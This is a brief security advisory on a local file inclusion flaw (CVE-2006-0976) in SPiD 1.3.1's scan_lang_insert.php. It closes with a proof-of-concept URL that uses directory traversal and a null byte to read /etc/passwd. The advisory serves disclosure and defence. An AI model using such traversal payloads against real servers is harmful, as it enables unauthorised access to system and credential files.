SPiD 1.3.1 - 'Scan_Lang_Insert.php' Local File Inclusion

Related Vulnerabilities: CVE-2006-0976  
Publish Date: 25 Feb 2006
Author: NSA Group
                source: http://www.securityfocus.com/bid/16822/info

SPiD is prone to a local file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

Successful exploitation of this issue may facilitate the unauthorized viewing of files and execution of local scripts.

http://www.example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00